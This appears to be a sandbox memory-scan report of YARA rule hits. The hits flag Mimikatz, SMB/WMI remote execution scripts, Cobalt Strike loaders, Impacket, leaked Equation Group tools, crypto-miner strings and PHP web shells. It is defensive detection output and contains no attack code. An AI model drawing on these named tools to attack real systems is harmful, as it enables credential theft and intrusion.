Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FIN7_Backdoor_Aug17 date = 2017-08-04, author = Florian Roth, description = Detects Word Dropper from Proofpoint FIN7 Report, reference = https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_SMBExec date = 2017-06-14, hash1 = 674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd, author = Florian Roth, description = Detects Invoke-WmiExec or Invoke-SmbExec, reference = https://github.com/Kevin-Robertson/Invoke-TheHash, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_WMIExec_Gen_1 date = 2017-06-14, hash2 = 7565d376665e3cd07d859a5cf37c2332a14c08eb808cc5d187a7f0533dc69e07, hash1 = 140c23514dbf8043b4f293c501c2f9046efcc1c08630621f651cfedb6eed8b97, author = Florian Roth, description = Detects Invoke-WmiExec or Invoke-SmbExec, reference = https://github.com/Kevin-Robertson/Invoke-TheHash, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_SMBExec_Invoke_WMIExec_1 date = 2017-06-14, hash2 = b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7, author = Florian Roth, description = Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, reference = https://github.com/Kevin-Robertson/Invoke-TheHash, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_WMIExec_Gen date = 2017-06-14, hash3 = b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7, hash2 = 674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd, author = Florian Roth, description = Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1, reference = https://github.com/Kevin-Robertson/Invoke-TheHash, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 56c6012c36aa863663fe5536d8b7fe4c460565d456ce2277a883f10d78893c01
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WMImplant date = 2017-03-24, hash1 = 860d7c237c2395b4f51b8c9bd0ee6cab06af38fff60ce3563d160d50c11d2f78, author = Florian Roth, description = Auto-generated rule - file WMImplant.ps1, reference = https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FVEY_ShadowBrokers_Jan17_Screen_Strings date = 2017-01-08, author = Florian Roth, description = Detects strings derived from the ShadowBroker\'s leak of Windows tools/exploits, reference = https://bit.no.com:43110/theshadowbrokers.bit/post/message7/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_OSiRis date = 2017-03-27, hash1 = 19e4a8b07f85c3d4c396d0c4e839495c9fba9405c06a631d57af588032d2416e, author = Florian Roth, description = Osiris Device Guard Bypass - file Invoke-OSiRis.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_KHRAT_script date = 2017-08-31, hash1 = 8c88b4177b59f4cac820b0019bcc7f6d3d50ce4badb689759ab0966780ae32e3, author = Florian Roth, description = Rule derived from KHRAT script but can match on other malicious scripts as well, reference = https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WiltedTulip_powershell date = 2017-07-23, hash1 = e5ee1f45cbfdb54b02180e158c3c1f080d89bce6a7d1fe99dd0ff09d47a36787, author = Florian Roth, description = Detects powershell script used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WiltedTulip_Windows_UM_Task date = 2017-07-23, hash1 = 4c2fc21a4aab7686877ddd35d74a917f6156e48117920d45a3d2f21fb74fedd3, author = Florian Roth, description = Detects a Windows scheduled task as used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WiltedTulip_WindowsTask date = 2017-07-23, hash5 = 984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34, hash4 = 5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a, hash3 = b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01, hash2 = 340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d, hash1 = c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c, author = Florian Roth, description = Detects hack tool used in Operation Wilted Tulip - Windows Tasks, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Impacket_Tools_Generic_1 date = 2017-04-07, hash5 = e2205539f29972d4e2a83eabf92af18dd406c9be97f70661c336ddf5eb496742, hash4 = ab909f8082c2d04f73d8be8f4c2640a5582294306dffdcc85e83a39d20c49ed6, hash3 = 2d8d500bcb3ffd22ddd8bd68b5b2ce935c958304f03729442a20a28b2c0328c1, hash2 = d256d1e05695d62a86d9e76830fcbb856ba7bd578165a561edd43b9f7fdb18a3, hash20 = 202a1d149be35d96e491b0b65516f631f3486215f78526160cf262d8ae179094, description = Compiled Impacket Tools, hash9 = 21d85b36197db47b94b0f4995d07b040a0455ebbe6d413bc33d926ee4e0315d9, hash8 = 0f7f0d8afb230c31fe6cf349c4012b430fc3d6722289938f7e33ea15b2996e1b, hash7 = dc85a3944fcb8cc0991be100859c4e1bf84062f7428c4dc27c71e08d88383c98, hash6 = 27bb10569a872367ba1cfca3cf1c9b428422c82af7ab4c2728f501406461c364, reference = https://github.com/maaaaz/impacket-examples-windows, super_rule = 4f7fad0676d3c3d2d89e8d4e74b6ec40af731b1ddf5499a0b81fc3b1cd797ee3, author = Florian Roth, hash10 = 4c2921702d18e0874b57638433474e54719ee6dfa39d323839d216952c5c834a, hash11 = 47afa5fd954190df825924c55112e65fd8ed0f7e1d6fd403ede5209623534d7d, hash12 = 7d715217e23a471d42d95c624179fe7de085af5670171d212b7b798ed9bf07c2, hash17 = e300339058a885475f5952fb4e9faaa09bb6eac26757443017b281c46b03108b, hash18 = 19544863758341fe7276c59d85f4aa17094045621ca9c98f8a9e7307c290bad4, license = https://creativecommons.org/licenses/by-nc/4.0/, hash19 = 2527fff1a3c780f6a757f13a8912278a417aea84295af1abfa4666572bbbf086, hash13 = 9706eb99e48e445ac4240b5acb2efd49468a800913e70e40b25c2bf80d6be35f, hash14 = d2856e98011541883e5b335cb46b713b1a6b2c414966a9de122ee7fb226aa7f7, hash15 = 8ab2b60aadf97e921e3a9df5cf1c135fbc851cb66d09b1043eaaa1dc01b9a699, hash16 = efff15e1815fb3c156678417d6037ddf4b711a3122c9b5bc2ca8dc97165d3769
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Auditcleaner date = 2017-04-08, hash1 = 8c172a60fa9e50f0df493bf5baeb7cc311baef327431526c47114335e0097626, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_elgingamble date = 2017-04-08, hash1 = 0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file elgingamble, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_cmsd date = 2017-04-08, hash1 = 634c50614e1f5f132f49ae204c4a28f62a32a39a3446084db5b0b49b564034b8, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file cmsd, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_ebbshave date = 2017-04-08, hash1 = eb5e0053299e087c87c2d5c6f90531cc1946019c85a43a2998c7b66a6f19ca4b, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_eggbasket date = 2017-04-08, hash1 = b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file eggbasket, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_sambal date = 2017-04-08, hash1 = 2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file sambal, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_envisioncollision date = 2017-04-08, hash1 = 75d5ec573afaf8064f5d516ae61fd105012cbeaaaa09c8c193c7b4f9c0646ea1, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file envisioncollision, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_cmsex date = 2017-04-08, hash1 = 2d8ae842e7b16172599f061b5b1f223386684a7482e87feeb47a38a3f011b810, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file cmsex, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_DUL date = 2017-04-08, hash1 = 24d1d50960d4ebf348b48b4db4a15e50f328ab2c0e24db805b106d527fc5fe8e, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file DUL, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_slugger2 date = 2017-04-08, hash1 = a6a9ab66d73e4b443a80a69ef55a64da7f0af08dfaa7e17eb19c327301a70bdf, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file slugger2, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_jackpop date = 2017-04-08, hash1 = 0b208af860bb2c7ef6b1ae1fcef604c2c3d15fc558ad8ea241160bf4cbac1519, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file jackpop, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_epoxyresin_v1_0_0 date = 2017-04-08, hash1 = eea8a6a674d5063d7d6fc9fe07060f35b16172de6d273748d70576b01bf01c73, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_estesfox date = 2017-04-08, hash1 = 33530cae130ee9d9deeee60df9292c00242c0fe6f7b8eedef8ed09881b7e1d5a, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file estesfox, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_elatedmonkey_1_0_1_1 date = 2017-04-08, hash1 = bf7a9dce326604f0681ca9f7f1c24524543b5be8b6fcc1ba427b18e2a4ff9090, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__ftshell_ftshell_v3_10_3_0 date = 2017-04-08, hash2 = 0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__scanner_scanner_v2_1_2 date = 2017-04-08, hash2 = 9807aaa7208ed6c5da91c7c30ca13d58d16336ebf9753a5cea513bcb59de2cff, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__ghost_sparc_ghost_x86_3 date = 2017-04-08, hash2 = 82c899d1f05b50a85646a782cddb774d194ef85b74e1be642a8be2c7119f4e33, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = d5ff0208d9532fc0c6716bd57297397c8151a01bf4f21311f24e7a72551f9bf1
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__jparsescan_parsescan_5 date = 2017-04-08, hash2 = 942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__funnelout_v4_1_0_1 date = 2017-04-08, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 457ed14e806fdbda91c4237c8dc058c55e5678f1eecdd78572eff6ca0ed86d33
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__magicjack_v1_1_0_0_client date = 2017-04-08, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__ftshell date = 2017-04-08, hash4 = 0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_noclient_3_3_2 date = 2017-04-09, hash1 = 3cf0eb010c431372af5f32e2ee8c757831215f8836cabc7d805572bb5574fc72, author = Florian Roth, description = Equation Group hack tool set, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Toolset_Apr17_Eternalromance date = 2017-04-15, hash2 = b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Toolset_Apr17_Gen2 date = 2017-04-15, hash4 = 8f7e10a8eedea37ee3222c447410fd5b949bd352d72ef22ef0b2821d9df2f5ba, hash3 = f2e90e04ddd05fa5f9b2fec024cd07365aebc098593d636038ebc2720700662b, hash2 = 561c0d4fc6e0ff0a78613d238c96aed4226fbb7bb9ceea1d19bc770207a6be1e, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 7fe425cd040608132d4f4ab2671e04b340a102a20c97ffdcf1b75be43a9369b5
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Toolset_Apr17_ntevt date = 2017-04-15, hash1 = 4254ee5e688fc09bdc72bcc9c51b1524a2bb25a9fb841feaf03bc7ec1a9975bf, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld date = 2017-04-15, hash5 = 8419866c9058d738ebc1a18567fef52a3f12c47270f2e003b3e1242d86d62a46, hash4 = 551174b9791fc5c1c6e379dac6110d0aba7277b450c2563e34581565609bc88e, hash3 = c10f4b9abee0fde50fe7c21b9948a2532744a53bb4c578630a81d2911f6105a3, hash2 = 320144a7842500a5b69ec16f81a9d1d4c8172bb92301afd07fb79bc0eca81557, hash1 = 9ab667b7b5b9adf4ff1d6db6f804824a22c7cc003eb4208d5b2f12809f5e69d0, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0 date = 2017-04-15, hash2 = 5db457e7c7dba80383b1df0c86e94dc6859d45e1d188c576f2ba5edee139d9ae, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 052e778c26120c683ee2d9f93677d9217e9d6c61ffc0ab19202314ab865e3927
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4 date = 2017-04-15, hash5 = 5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337, hash4 = c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674, hash3 = 9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556, hash2 = c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 3e181ca31f1f75a6244b8e72afaa630171f182fbe907df4f8b656cc4a31602f6
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_scanner_output date = 2017-04-17, author = Florian Roth, description = Detects output generated by EQGRP scanner.exe, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: dragos_crashoverride_moduleStrings author = Dragos Inc, description = IEC-104 Interaction Module Program Strings, reference = https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Obfuscated_VBS_April17 date = 2017-04-21, author = Florian Roth, description = Detects cloaked Mimikatz in VBS obfuscation, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Obfuscated_JS_April17 date = 2017-04-21, author = Florian Roth, description = Detects cloaked Mimikatz in JS obfuscation, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.324570617.0000000006668000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.323986177.0000000002E7D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: scanarator author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file scanarator.exe, hash = 848bd5a518e0b6c05bd29aceb8536c46
Source: 0000000A.00000003.323415245.0000000006628000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_webshells_new_PHP1 date = 2014/03/28, author = Florian Roth, description = Web shells - generated from file PHP1.php, score = 14c7281fdaf2ae004ca5fec8753ce3cb
Source: 0000000A.00000003.323415245.0000000006628000.00000004.00000001.sdmp, type: MEMORY	Matched rule: h4ntu_shell__powered_by_tsoi_ description = Semi-Auto-generated - file h4ntu shell [powered by tsoi
Source: 0000000A.00000003.313108656.0000000006641000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FVEY_ShadowBroker_Auct_Dez16_Strings date = 2016-12-17, author = Florian Roth, description = String from the ShodowBroker Files Screenshots - Dec 2016, score = https://bit.no.com:43110/theshadowbrokers.bit/post/message6/
Source: 00000013.00000003.458084749.0000000006D9C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: shankar_php_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file shankar.php.php.txt, hash = 6eb9db6a3974e511b7951b8f7e7136bb
Source: 00000013.00000003.438854953.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: multiple_webshells_0015 hash3 = 38fd7e45f9c11a37463c3ded1c76af4c, hash2 = 09609851caa129e40b0d56e90dfc476c, hash1 = 44542e5c3e9790815c49d5f9beffbbf2, hash0 = 9c5bb5e3a46ec28039e8986324e42792, author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt, super_rule = _wacking_php_php_1_SpecialShell_99_php_php_c100_php
Source: 00000013.00000003.438854953.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Webshell_27_9_acid_c99_locus7s date = 2016-01-11, hash5 = bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96, hash4 = 07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a, hash3 = 960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668, hash2 = 7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549, author = Florian Roth, description = Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt, hash8 = ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f, hash7 = ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f, hash6 = 5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3, reference = https://github.com/nikicat/web-malware-collection, score = 2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4
Source: 00000013.00000003.443343261.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: multiple_webshells_0015 hash3 = 38fd7e45f9c11a37463c3ded1c76af4c, hash2 = 09609851caa129e40b0d56e90dfc476c, hash1 = 44542e5c3e9790815c49d5f9beffbbf2, hash0 = 9c5bb5e3a46ec28039e8986324e42792, author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt, super_rule = _wacking_php_php_1_SpecialShell_99_php_php_c100_php
